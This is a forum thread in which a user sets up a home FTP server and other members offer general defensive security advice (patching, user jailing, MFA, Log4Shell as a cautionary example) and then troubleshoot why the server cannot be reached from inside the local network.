Desperately trying to set up an FTP server

MrSoftware

Joined Oct 29, 2013
2,273
There are multiple aspects to look at. You're looking at the first, which is proper server configuration. i.e. how to configure the server such that users can only do what you want them to do (jailed in their own directory), and what options to use to keep logins and data secure (MFA, sftp encryption required, VPN required, IP address limits, each users directory individually encrypted with different keys, etc.. whatever is appropriate for your situation). Also the machine must be monitored to be sure every piece of software is kept up to date and security vulnerabilities are patched quickly. Additionally you must ask what happens when the bad guy realizes that a specifically crafted command, executed remotely, breaks the server in a way that gives them an administrator level shell into the system? Once inside, what can they access? What other machines on the network could be vulnerable? If the bad guy erases everything or executes ransomware, are your backups good enough, and will the downtime kill your business? Questions like this. For a recent example, check out the log4j vulnerability that set the security world on fire for a bit. Scroll down to the "How the Log4Shell vulnerability works", hopefully I got this link right:

How the Log4Shell vulnerability works

Software today relies on so many open source and shared libraries, often one vulnerability in one library can affect a great number of machines (such as log4j), and the bad guys quickly automate attacks then sell automated attack tools as commodities. Ransomware is perhaps the most prevalent example of commoditized malware today. The people doing the attacks no longer have to be hacker experts, they just buy the tools and follow the instructions to use them. The cost of the tool is the price of doing business. For this reason, if you're going to be handling super sensitive data, it may be worth looking into a company that specializes in selling secure file sharing services. You pay them a fee, they give you a site that you configure how you want and they handle all the dirty work on the back end. One example of this would be Google Drive, or Microsoft One Drive. You pay them a fee, they give you storage space and they handle all of the server side work. I believe there may even be ftp access available for both of these. I'm not sure if one of these fits your needs, there are others, but it's an example of hiring someone to handle the back end for you.
 

Hallander

Joined Apr 23, 2022
1
Glad to hear it worked!

My recommendation when deployed on a live release is to get a static IP with your IWSP and white list the related IP servers into your VPC or hosting environment. This is a good practice to avoid POD's attacks.

Keep up the good work!
best regards.
aka AlvaroG.
 

Thread Starter

cmartinez

Joined Jan 17, 2007
8,789
There are multiple aspects to look at. You're looking at the first, which is proper server configuration. i.e. how to configure the server such that users can only do what you want them to do (jailed in their own directory), and what options to use to keep logins and data secure (MFA, sftp encryption required, VPN required, IP address limits, each users directory individually encrypted with different keys, etc.. whatever is appropriate for your situation). Also the machine must be monitored to be sure every piece of software is kept up to date and security vulnerabilities are patched quickly. Additionally you must ask what happens when the bad guy realizes that a specifically crafted command, executed remotely, breaks the server in a way that gives them an administrator level shell into the system? Once inside, what can they access? What other machines on the network could be vulnerable? If the bad guy erases everything or executes ransomware, are your backups good enough, and will the downtime kill your business? Questions like this. For a recent example, check out the log4j vulnerability that set the security world on fire for a bit. Scroll down to the "How the Log4Shell vulnerability works", hopefully I got this link right:

How the Log4Shell vulnerability works

Software today relies on so many open source and shared libraries, often one vulnerability in one library can affect a great number of machines (such as log4j), and the bad guys quickly automate attacks then sell automated attack tools as commodities. Ransomware is perhaps the most prevalent example of commoditized malware today. The people doing the attacks no longer have to be hacker experts, they just buy the tools and follow the instructions to use them. The cost of the tool is the price of doing business. For this reason, if you're going to be handling super sensitive data, it may be worth looking into a company that specializes in selling secure file sharing services. You pay them a fee, they give you a site that you configure how you want and they handle all the dirty work on the back end. One example of this would be Google Drive, or Microsoft One Drive. You pay them a fee, they give you storage space and they handle all of the server side work. I believe there may even be ftp access available for both of these. I'm not sure if one of these fits your needs, there are others, but it's an example of hiring someone to handle the back end for you.
Thanks, MS for the explanation. After reading your post, I went and immediately disabled the server's capability of handling HTTP requests, and I also disabled its ability of running scripts.
 

Ya’akov

Joined Jan 27, 2019
10,262
I DID IT!!!! ... I stupidly turned on and off my firewalls for a brief moment, to see if that would change the situation, to no avail. But by doing that I inadvert reset its settings. And that forced me to go again not only through the inbound/outbound rules, but also I manually added the CompleteFTP server software to the list of programs (which I hand't done before, because it was already (partially) working) ... and voilá! , we're online.

Yaakov, please test the connection with the parameters I gave you in my PM, if you can.
Hey, @cmartinez I just saw this. Do you still need help?

As far as vulnerabilities, while it should be the case that the FTP server code prevents access outside the configured directories, there can be flaws in software designs that can be exploited. For example this is for an older version (I assume) of the server you are using. People are always finding ways to make software do things it wasn't intended to do.

In general there is an infosec rule: "what you call a service the bad guys call an opportunity". Every port you open to the world increases the "attack service" for the bad guys, and every well know port will see scripts trying to use known exploits to gain control of your machine.

Keep your software up to date, check software for vulns here. You need to be vigilant, if the server software publisher offers a security mailing list, get on it.
 

Thread Starter

cmartinez

Joined Jan 17, 2007
8,789
Hello, I'm back. My server has been running smoothly and without a hitch all this time. I can easily access it using the FileZilla client or the free and easy to use AndFTP smartphone app.

I have one question, however. If I try to access the server from within my own network (LAN) I get an error message saying that the server can't be found. The server must be accessed from outside the LAN or otherwise it won't work. In example, if I try to access it from my phone (or laptop) through my WiFi network I'll get an error message. But if I disconnect the phone from the WiFi AP and use Mobile data (GPRS) instead then everything will work fine. Why's that?
 

Ya’akov

Joined Jan 27, 2019
10,262
Hello, I'm back. My server has been running smoothly and without a hitch all this time. I can easily access it using the FileZilla client or the free and easy to use AndFTP smartphone app.

I have one question, however. If I try to access the server from within my own network (LAN) I get an error message saying that the server can't be found. The server must be accessed from outside the LAN or otherwise it won't work. In example, if I try to access it from my phone (or laptop) through my WiFi network I'll get an error message. But if I disconnect the phone from the WiFi AP and use Mobile data (GPRS) instead then everything will work fine. Why's that?
This depends on your configuration and how you are trying to access the sever. The server's address outside will not be the same as its address on LAN. If you try to access it be a name you might be seeing a "split horizon" DNS response where the them gets to an LAN address if you are on the LAN, not the outside address. If your server is not bound to ports 21 and 20 on its LAN interface, you won't be able to access it from the LAN.
 

Thread Starter

cmartinez

Joined Jan 17, 2007
8,789
This depends on your configuration and how you are trying to access the sever. The server's address outside will not be the same as its address on LAN. If you try to access it be a name you might be seeing a "split horizon" DNS response where the them gets to an LAN address if you are on the LAN, not the outside address. If your server is not bound to ports 21 and 20 on its LAN interface, you won't be able to access it from the LAN.
The client does identify the server's outside IP address. I know that because I can see the script as it runs in real time. But I hadn't considered the way the ports are accessed through the LAN ... I'm gonna check it out and see if that's what's going on.

Thanks for your help. It's always throughly appreciated.
 

Thread Starter

cmartinez

Joined Jan 17, 2007
8,789
So I went through my modem's settings, and port forwarding is configured as follows:

1736263417356.png

Bot WAN and LAN ports are correctly configured to point to the computer where the Server Software is installed. So, no. I don't think that's it.

I wonder if it has something to do with the way the Server Software itself is configured.
 

Thread Starter

cmartinez

Joined Jan 17, 2007
8,789
Please clarify something: if you attempt to connect to 192.196.1.100 with the FTP client, it fails?
No. If I try to connect from the outside (not within the LAN) to the domain that my computer is addressed at (xxxx.net) then the client will find the server and everything will work fine. But if I try to do the same thing from within the LAN, then the client will also find the server, but it won't be able to connect.
 
Top